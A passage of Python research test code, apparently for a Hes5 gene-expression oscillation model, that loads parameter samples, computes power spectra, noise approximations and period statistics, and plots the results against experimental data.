# fewer_samples = these_posterior_samples[:1000]
fewer_samples = these_posterior_samples
power_spectra = hes5.calculate_power_spectra_at_parameter_points(fewer_samples)
my_figure = plt.figure( figsize = (4.5, 1.5) )
for power_spectrum in power_spectra[:,1:].transpose():
plt.plot(power_spectra[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.02, zorder = 0)
plt.plot(power_spectra[:,0], np.mean(power_spectra[:,1:],axis = 1), ls = 'solid',
color ='blue')
# plt.gca().locator_params(axis='y', tight = True, nbins=5)
# plt.ylim(0,sorted_bars[-1]*1.2)
plt.xlim(0.0,0.01)
plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.xlabel('Frequency [1/min]')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'power_spectra_before.pdf'), dpi = 400)
def xest_plot_power_spectra_before_and_after(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_repeated')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_massive')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
index_to_parameter_name_lookup = {0: 'basal_transcription_rate',
1: 'translation_rate',
2: 'repression_threshold',
3: 'time_delay',
4: 'hill_coefficient',
5: 'mRNA_degradation_rate',
6: 'protein_degradation_rate'}
parameter_name_to_index_lookup = {'basal_transcription_rate':0,
'translation_rate' :1,
'repression_threshold' :2,
'time_delay' :3,
'hill_coefficient' :4,
'mRNA_degradation_rate' :5,
'protein_degradation_rate':6 }
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
# 'data',
'output',
'repeated_relative_sweeps_' +
parameter_name + '.npy'))
print('these accepted base samples are')
# number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
# my_parameter_sweep_results[:,9,4] < 0.1))[0])
number_of_absolute_samples = len(np.where(np.logical_or(accepted_model_results[:,2] > 600,
accepted_model_results[:,3] < 0.1))[0])
print(number_of_absolute_samples)
decrease_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,0,3] < 300,
my_parameter_sweep_results[:,0,4] > 0.1)))
# decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
# my_parameter_sweep_results[:,4,4] > 0.1)))
increase_indices = np.where(np.logical_and(np.logical_or(accepted_model_results[:,3] < 0.1,
accepted_model_results[:,2] > 600),
np.logical_and(my_parameter_sweep_results[:,1,3] < 300,
my_parameter_sweep_results[:,1,4] > 0.1)))
# increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,9,3] > 600),
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
decrease_parameters_before = my_posterior_samples[decrease_indices]
increase_parameters_before = my_posterior_samples[increase_indices]
print('number of accepted samples is ' + str(len(decrease_indices[0])))
print('number of accepted samples is ' + str(len(increase_indices[0])))
print('these are the before parameters')
print(decrease_parameters_before)
print(increase_parameters_before)
if len(decrease_parameters_before) > 100:
decrease_parameters_before = decrease_parameters_before[:100]
if len(increase_parameters_before) > 100:
increase_parameters_before = increase_parameters_before[:100]
dummy_zeros = np.zeros((decrease_parameters_before.shape[0],2))
decrease_parameters_after = np.hstack((decrease_parameters_before,dummy_zeros))
dummy_zeros = np.zeros((increase_parameters_before.shape[0],2))
increase_parameters_after = np.hstack((increase_parameters_before,dummy_zeros))
decrease_parameters_after[:,-2] = np.log(2.)/30.
increase_parameters_after[:,-2] = np.log(2.)/30.
decrease_parameters_after[:,-1] = np.log(2.)/90.
increase_parameters_after[:,-1] = np.log(2.)/90.
print('these are the increase parameters after')
print(increase_parameters_after)
parameter_index = parameter_name_to_index_lookup[parameter_name]
try:
print('hello1')
reference_decrease_parameters = decrease_parameters_after[:,parameter_index]
print(reference_decrease_parameters)
decreased_parameters = reference_decrease_parameters*0.5
print('hello2')
decrease_parameters_after[:,parameter_index] = decreased_parameters
print('hello3')
decrease_spectra_before = hes5.calculate_power_spectra_at_parameter_points(decrease_parameters_before)
print('hello4')
decrease_spectra_after = hes5.calculate_power_spectra_at_parameter_points(decrease_parameters_after)
print('hello5')
except Exception as e:
print(repr(e))
decrease_spectra_before = np.array([[0,0],[0,0]])
decrease_spectra_after = np.array([[0,0],[0,0]])
try:
print('hello1')
reference_increase_parameters = increase_parameters_after[:,parameter_index]
print(reference_increase_parameters)
increased_parameters = reference_increase_parameters*1.5
print('hello2')
increase_parameters_after[:,parameter_index] = increased_parameters
print('hello3')
increase_spectra_before = hes5.calculate_power_spectra_at_parameter_points(increase_parameters_before)
print('hello4')
increase_spectra_after = hes5.calculate_power_spectra_at_parameter_points(increase_parameters_after)
print('hello5')
except Exception as e:
print(repr(e))
increase_spectra_before = np.array([[0,0],[0,0]])
increase_spectra_after = np.array([[0,0],[0,0]])
my_figure = plt.figure( figsize = (6, 4.5) )
my_figure.add_subplot(221)
for power_spectrum in decrease_spectra_before[:,1:].transpose():
plt.plot(decrease_spectra_before[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(decrease_spectra_before[:,0],
np.mean(decrease_spectra_before[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
# plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' decrease before')
plt.xlabel('Frequency [1/min]')
my_figure.add_subplot(222)
for power_spectrum in decrease_spectra_after[:,1:].transpose():
plt.plot(decrease_spectra_after[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(decrease_spectra_after[:,0],
np.mean(decrease_spectra_after[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
# plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' decrease after')
plt.xlabel('Frequency [1/min]')
my_figure.add_subplot(223)
for power_spectrum in increase_spectra_before[:,1:].transpose():
plt.plot(increase_spectra_before[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(increase_spectra_before[:,0],
np.mean(increase_spectra_before[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
# plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' increase before')
plt.xlabel('Frequency [1/min]')
my_figure.add_subplot(224)
for power_spectrum in increase_spectra_after[:,1:].transpose():
plt.plot(increase_spectra_after[:,0], power_spectrum, ls = 'solid',
color ='teal', alpha = 0.2, zorder = 0)
plt.plot(increase_spectra_after[:,0],
np.mean(increase_spectra_after[:,1:],axis = 1), ls = 'solid',
color ='blue')
plt.xlim(0.0,0.01)
plt.axvline(1/300.0)
plt.axvline(1/600.0)
plt.gca().set_rasterization_zorder(1)
plt.ylabel('Power')
plt.title(parameter_name + ' increase after')
plt.xlabel('Frequency [1/min]')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
parameter_name + 'likelihood_plot_spectra_investigation.pdf'))
def xest_plot_stochastic_amplification(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]>0.3))))
# model_results[:,1]>0.05)))
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
this_parameter = my_posterior_samples[0]
print('parameter is')
print(this_parameter)
number_of_trajectories = 3
hes5_mRNA_trajectories, hes5_protein_trajectories = hes5.generate_multiple_langevin_trajectories( number_of_trajectories = number_of_trajectories,
duration = 2000,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2],
hill_coefficient = this_parameter[4],
equilibration_time = 0)
#
deterministic_trajectory = hes5.generate_deterministic_trajectory(duration = 2000,
repression_threshold = this_parameter[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
translation_rate = this_parameter[1],
basal_transcription_rate = this_parameter[0],
transcription_delay = this_parameter[3],
initial_mRNA = 3,
initial_protein = this_parameter[2],
# repression_threshold = 31400,
# mRNA_degradation_rate = np.log(2)/30,
# protein_degradation_rate = np.log(2)/90,
# translation_rate = 29,
# basal_transcription_rate = 11,
# transcription_delay = 29,
# initial_mRNA = 3,
# initial_protein = 31400,
hill_coefficient = this_parameter[4],
for_negative_times = 'no_negative')[:-1]
mean_hes5_protein_trajectory = np.mean(hes5_protein_trajectories[:,1:], axis = 1)
mean_hes5_rna_trajectory = np.mean(hes5_mRNA_trajectories[:,1:], axis = 1)
figuresize = (4,2.5)
my_figure = plt.figure(figsize = figuresize)
plt.plot( hes5_protein_trajectories[:,0],
hes5_protein_trajectories[:,1]/10000, color = 'black',
lw = 0.5, alpha = 0.2, label = 'stochastic' )
for trajectory_index in range(2,number_of_trajectories+1):
# plt.plot( hes5_mRNA_trajectories[:,0],
# hes5_mRNA_trajectories[:,trajectory_index]*1000., color = 'black',
# lw = 0.5, alpha = 0.1 )
plt.plot( hes5_protein_trajectories[:,0],
hes5_protein_trajectories[:,trajectory_index]/10000, color = 'black',
lw = 0.5, alpha = 0.2 )
# plt.plot( hes5_mRNA_trajectories[:,0],
# mean_hes5_rna_trajectory*1000., label = 'mRNA*1000', color = 'blue',
# lw = 0.5 )
plt.plot( deterministic_trajectory[:,0], deterministic_trajectory[:,2]/10000,
lw = 0.5, label = 'deterministic' )
# plt.plot( hes5_protein_trajectories[:,0],
# mean_hes5_protein_trajectory, label = 'Protein', color = 'blue', ls = '--',
# lw = 0.5, dashes = [1,1] )
plt.xlabel('Time [min]')
plt.ylabel('Hes5 expression/1e4')
plt.xlim(0,2000)
# plt.ylim(0,10)
# plt.legend(bbox_to_anchor=(1.05, 1.1), loc = 'upper right')
plt.legend(loc = 'upper right')
plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','stochastic_amplficiation.pdf'))
def xest_investigate_lna_prediction_at_low_degradation(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.03)))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
sample = posterior_samples[0]
#First: run the model for 100 minutes
# my_trajectory = hes5.generate_deterministic_trajectory( duration = 720,
# repression_threshold = 100,
# mRNA_degradation_rate = 0.03,
# protein_degradation_rate = 0.03,
# transcription_delay = 19,
# initial_mRNA = 3,
# initial_protein = 100)
# # integrator = 'PyDDE',
# # for_negative_times = 'no_negative' )
print('experimental values for mrna and protein degradation are')
print(np.log(2)/30)
print(np.log(2)/90)
theoretical_power_spectrum = hes5.calculate_theoretical_power_spectrum_at_parameter_point( repression_threshold = sample[2],
hill_coefficient = sample[4],
# mRNA_degradation_rate = np.log(2)/30,
# protein_degradation_rate = np.log(2)/90,
mRNA_degradation_rate = 0.01,
protein_degradation_rate = 0.01,
basal_transcription_rate = sample[0],
translation_rate = sample[1],
transcription_delay = sample[3] )
coherence, period = hes5.calculate_coherence_and_period_of_power_spectrum( theoretical_power_spectrum )
print('theoretical coherence and period are')
print(coherence)
print(period)
full_parameter_point = np.array([sample[0],
sample[1],
sample[2],
sample[3],
sample[4],
0.01,
0.01])
# np.log(2)/30,
# np.log(2)/90])
real_power_spectrum = hes5.calculate_power_spectrum_at_parameter_point( full_parameter_point )
#Second, plot the model
figuresize = (4,2.75)
my_figure = plt.figure()
plt.plot(theoretical_power_spectrum[:,0],
theoretical_power_spectrum[:,1])
plt.plot(real_power_spectrum[:,0],
real_power_spectrum[:,1])
plt.xlabel('Frequency [1/min]')
plt.ylabel('Power')
plt.xlim(0,0.01)
plt.legend()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','weird_power_spectrum.pdf'))
def xest_plot_lna_std_vs_model_results(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
theoretical_standard_deviation = np.zeros(len(posterior_samples))
for sample_index, sample in enumerate(posterior_samples):
this_standard_deviation = hes5.calculate_approximate_standard_deviation_at_parameter_point(basal_transcription_rate = sample[0],
translation_rate = sample[1],
repression_threshold = sample[2],
transcription_delay = sample[3],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
hill_coefficient = sample[4]
)
steady_state_mrna, steady_state_protein = hes5.calculate_steady_state_of_ode(basal_transcription_rate = sample[0],
translation_rate = sample[1],
repression_threshold = sample[2],
mRNA_degradation_rate = np.log(2)/30,
protein_degradation_rate = np.log(2)/90,
hill_coefficient = sample[4]
)
relative_standard_deviation = this_standard_deviation/steady_state_protein
theoretical_standard_deviation[ sample_index ] = relative_standard_deviation
error_ratios = theoretical_standard_deviation / posterior_results[:,1]
relative_errors = np.abs(error_ratios - 1)
number_of_poor_samples = np.sum(relative_errors>0.1)
print('ratio of poor approximations is')
print(number_of_poor_samples/float(len(posterior_samples)))
print('total number is')
print(number_of_poor_samples)
plt.figure(figsize = (4.5,2.5))
plt.scatter(theoretical_standard_deviation, posterior_results[:,1], s = 0.5)
plt.plot([0.0,0.25],1.1*np.array([0.0,0.25]), lw = 1, color = 'grey')
plt.plot([0.0,0.25],0.9*np.array([0.0,0.25]), lw = 1, color = 'grey')
plt.xlabel("LNA")
plt.ylabel("CLE")
plt.title("Relative standard deviation")
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','LNA_validation.pdf'))
# now, we need to plot where the outliers are:
outlier_mask = relative_errors > 0.1
outlier_samples = posterior_samples[outlier_mask]
outlier_results = posterior_results[outlier_mask]
print('outlier coherences are')
print(outlier_results[:,3])
outlier_samples[:,2]/=10000
print('minimal outlier coherence is')
print(np.min(outlier_results[:,3]))
print('posterior samples with coherence above 0.44')
print(np.sum(posterior_results[:,3]>0.5))
data_frame = pd.DataFrame( data = outlier_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','LNA_outliers.pdf'))
#what happens in the cases when the CLE has higher std than the LNA?
outlier_mask = error_ratios<0.9
outlier_samples = posterior_samples[outlier_mask]
outlier_results = posterior_results[outlier_mask]
print('outlier coherences are')
print(outlier_results[:,3])
outlier_samples[:,2]/=10000
print('minimal outlier coherence is')
print(np.min(outlier_results[:,3]))
print('posterior samples with coherence above 0.44')
print(np.sum(posterior_results[:,3]>0.5))
data_frame = pd.DataFrame( data = outlier_samples,
columns= ['Transcription rate',
'Translation rate',
'Repression threshold/1e4',
'Transcription delay',
'Hill coefficient'])
sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (11,3))
my_figure.add_subplot(151)
# transcription_rate_bins = np.logspace(-1,2,20)
transcription_rate_bins = np.linspace(-1,np.log10(60.0),20)
# transcription_rate_histogram,_ = np.histogram( data_frame['Transcription delay'],
# bins = time_delay_bins )
sns.distplot(np.log10(data_frame['Transcription rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = transcription_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(0.1,100)
plt.gca().set_xlim(-1,np.log10(60.0))
plt.ylabel("Probability", labelpad = 20)
plt.xlabel("Transcription rate \n [1/min]")
plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
plt.gca().set_ylim(0,1.0)
plt.xticks([-1,0,1], [r'$10^{-1}$',r'$10^0$',r'$10^1$'])
# plt.yticks([])
my_figure.add_subplot(152)
# translation_rate_bins = np.logspace(0,2.3,20)
translation_rate_bins = np.linspace(0,np.log10(40),20)
sns.distplot(np.log10(data_frame['Translation rate']),
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = translation_rate_bins)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
plt.gca().set_xlim(0,np.log10(40))
plt.gca().set_ylim(0,1.3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xticks([0,1], [r'$10^0$',r'$10^1$'])
plt.xlabel("Translation rate \n [1/min]")
plt.gca().set_ylim(0,2.0)
# plt.yticks([])
my_figure.add_subplot(153)
sns.distplot(data_frame['Repression threshold/1e4'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.xlabel("Repression threshold \n [1e4]")
plt.gca().set_ylim(0,0.22)
plt.gca().set_xlim(0,12)
plt.gca().locator_params(axis='x', tight = True, nbins=4)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plots_to_shift = []
plots_to_shift.append(my_figure.add_subplot(154))
time_delay_bins = np.linspace(5,40,10)
sns.distplot(data_frame['Transcription delay'],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = time_delay_bins)
plt.gca().set_xlim(5,40)
# plt.gca().set_ylim(0,0.035)
plt.gca().set_ylim(0,0.04)
plt.gca().locator_params(axis='x', tight = True, nbins=5)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
plt.xlabel(" Transcription delay \n [min]")
# plt.yticks([])
plots_to_shift.append(my_figure.add_subplot(155))
sns.distplot(data_frame['Hill coefficient'],
kde = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
rug = False,
bins = 20)
# plt.gca().set_xlim(1,200)
plt.gca().set_ylim(0,0.35)
plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','LNA_other_outliers.pdf'))
def xest_calculate_variance(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
# first: calculate theoretical standard deviation
# then: compare to model result
sample = posterior_samples[5]
sample_result = posterior_results[5]
mRNA_degradation_rate = np.log(2)/30
protein_degradation_rate = np.log(2)/90
basal_transcription_rate = sample[0]
translation_rate = sample[1]
repression_threshold = sample[2]
transcription_delay = sample[3]
hill_coefficient = sample[4]
actual_frequencies = np.linspace(0,0.01,1000)
pi_frequencies = actual_frequencies*2*np.pi
steady_state_mrna, steady_state_protein = hes5.calculate_steady_state_of_ode( repression_threshold = float(repression_threshold),
hill_coefficient = hill_coefficient,
mRNA_degradation_rate = mRNA_degradation_rate,
protein_degradation_rate = protein_degradation_rate,
basal_transcription_rate = basal_transcription_rate,
translation_rate = translation_rate)
steady_state_hill_function_value = 1.0/(1.0 + np.power( steady_state_protein/float(repression_threshold),
hill_coefficient ))
steady_state_hill_derivative = -hill_coefficient*np.power(steady_state_protein/float(repression_threshold),
hill_coefficient - 1)/(repression_threshold*
np.power(1.0+np.power(steady_state_protein/float(repression_threshold),
hill_coefficient),2))
# steady_state_hill_derivative = -hill_coefficient/float(repression_threshold)*np.power(
# 1.0 + steady_state_protein/float(repression_threshold),
# hill_coefficient)
power_spectrum_values = ( translation_rate*translation_rate*
( basal_transcription_rate * steady_state_hill_function_value +
mRNA_degradation_rate*steady_state_mrna)
+
( np.power(pi_frequencies,2) + mRNA_degradation_rate*mRNA_degradation_rate)*
( translation_rate*steady_state_mrna + protein_degradation_rate*steady_state_protein)
)/(np.power(- np.power(pi_frequencies,2) +
protein_degradation_rate*mRNA_degradation_rate
- basal_transcription_rate*translation_rate*steady_state_hill_derivative*
np.cos(pi_frequencies*transcription_delay),2)
+
np.power((protein_degradation_rate+mRNA_degradation_rate)*
pi_frequencies +
basal_transcription_rate*translation_rate*steady_state_hill_derivative*
np.sin(pi_frequencies*transcription_delay), 2)
)
power_spectrum = np.vstack((pi_frequencies, power_spectrum_values)).transpose()
integral = np.trapz(power_spectrum[:,1], power_spectrum[:,0])
power_spectrum_intercept = integral
variance = 0.5/np.pi*power_spectrum_intercept
relative_standard_deviation = np.sqrt(variance)/steady_state_protein
print('variance over mean over real value')
print((power_spectrum_intercept/steady_state_protein)/sample_result[1])
print('std over mean')
print((np.sqrt(power_spectrum_intercept)/steady_state_protein)/sample_result[1])
def xest_get_hilbert_periods_at_representative_model_parameter(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]>0.05,
np.logical_and(model_results[:,3]>0.15,
model_results[:,3]<0.2))))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
sample = posterior_samples[2]
these_mrna_traces, these_protein_traces = hes5.generate_multiple_langevin_trajectories( 200, # number_of_trajectories
1500*5, #duration
sample[2], #repression_threshold,
sample[4], #hill_coefficient,
np.log(2)/30, #mRNA_degradation_rate,
np.log(2)/90, #protein_degradation_rate,
sample[0], #basal_transcription_rate,
sample[1], #translation_rate,
sample[3], #transcription_delay,
10, #initial_mRNA,
sample[2], #initial_protein,
1000)
this_power_spectrum,this_coherence, this_period = hes5.calculate_power_spectrum_of_trajectories(these_protein_traces)
# get first set of periods
all_periods = hes5.get_period_measurements_from_signal(these_protein_traces[:,0],
these_protein_traces[:,1])
# and now add the rest
for trace in these_protein_traces[:,1:].transpose():
these_periods = hes5.get_period_measurements_from_signal(these_protein_traces[:,0], trace)
all_periods = np.hstack((all_periods, these_periods))
print(all_periods)
plt.figure(figsize = (6.5,2.5))
plt.subplot(121)
plt.plot(this_power_spectrum[:,0],this_power_spectrum[:,1])
plt.axvline(1/this_period, color = 'purple')
plt.xlim(0,0.01)
plt.xlabel('Frequency [1/min]')
plt.ylabel('Power')
plt.title('Period: ' + '{:.2f}'.format(this_period/60) + 'h, Coherence: ' + '{:.2f}'.format(this_coherence))
plt.subplot(122)
plt.hist(all_periods/60, range = (0,10), density = True, edgecolor = 'black')
plt.axvline(this_period/60, color = 'purple')
# plt.axvline(np.mean(all_periods)/60, color = 'black')
plt.xlabel('Period [h]')
# plt.ylim(0,0.0001)
plt.ylabel('Likelihood')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__), 'output',
'representative_hilbert_periods.pdf'))
def xest_kolmogorov_smirnov_on_period_and_stdev(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
posterior_samples = prior_samples[accepted_indices]
posterior_results = model_results[accepted_indices]
experimental_periods = np.loadtxt(os.path.join(os.path.dirname(__file__), 'data',
'experimental_periods.csv'))
experimental_stdevs = np.loadtxt(os.path.join(os.path.dirname(__file__), 'data',
'experimental_stdevs.csv'))
simulated_periods = np.load(os.path.join(os.path.dirname(__file__), 'output',
'shortened_posterior_hilbert_periods_per_cell_one_sample.npy'))
real_simulated_periods = simulated_periods[simulated_periods<(12.0*60)]
simulated_stdevs = posterior_results[:,1]
print(experimental_periods)
print(experimental_stdevs)
period_stats = scipy.stats.ks_2samp(experimental_periods, real_simulated_periods/60)
print('period kolmogorov-smirnov test is')
print(scipy.stats.ks_2samp(experimental_periods, real_simulated_periods/60))
stdev_stats = scipy.stats.ks_2samp(experimental_stdevs, simulated_stdevs)
print('stdev kolmogorov-smirnov test is')
print(scipy.stats.ks_2samp(experimental_stdevs, simulated_stdevs))
plt.figure(figsize = [6.5,4.5])
plt.subplot(221)
sns.boxplot(data = [simulated_stdevs, experimental_stdevs])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.text(0.25,0.2, 'K-S-value: ' + '{:.2f}'.format(stdev_stats[0]) +
'\np-value: ' + '{:.2f}'.format(stdev_stats[1]), fontsize = 8)
plt.ylabel('Stdev')
plt.subplot(222)
sns.boxplot(data = [real_simulated_periods/60, experimental_periods])
plt.xticks([0,1], ['Model', 'Experiment'])
# plt.axhline(12)
plt.text(0.25,10, 'K-S-value: ' + '{:.2f}'.format(period_stats[0]) +
'\np-value: ' + '{:.2e}'.format(period_stats[1]), fontsize = 8)
